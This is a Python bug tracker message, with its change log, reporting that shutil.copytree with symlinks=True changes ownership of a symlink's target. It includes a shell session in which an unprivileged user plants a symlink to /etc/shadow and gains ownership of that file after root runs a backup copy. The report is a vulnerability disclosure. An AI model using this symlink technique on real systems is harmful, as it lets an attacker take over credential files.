Message246170
shutil.copytree(src, dst, symlink=True) destroys file system permissions and open security issues. See the following python/bash session:
# ls -l /etc/shadow
-rw-r----- 1 root shadow 1114 May 8 19:10 /etc/shadow
# su foobar
$ ln -s /etc/shadow && exit
# python -c '__import__("shutil").copytree('/home/', '/backups/home', symlinks=True)
# ls -l /etc/shadow
-rw-r----- 1 foobar Domain Users 1114 Mai 8 19:10 /etc/shadow
As you can see the file "/etc/shadow" is now owned by the user "foobar" and its primary group. |
|
Date |
User |
Action |
Args |
2015-07-03 12:41:25 | spaceone | set | recipients:
+ spaceone, eric.araujo, dstufft |
2015-07-03 12:41:25 | spaceone | set | messageid: <1435927285.75.0.961526406644.issue24558@psf.upfronthosting.co.za> |
2015-07-03 12:41:25 | spaceone | link | issue24558 messages |
2015-07-03 12:41:24 | spaceone | create | |
|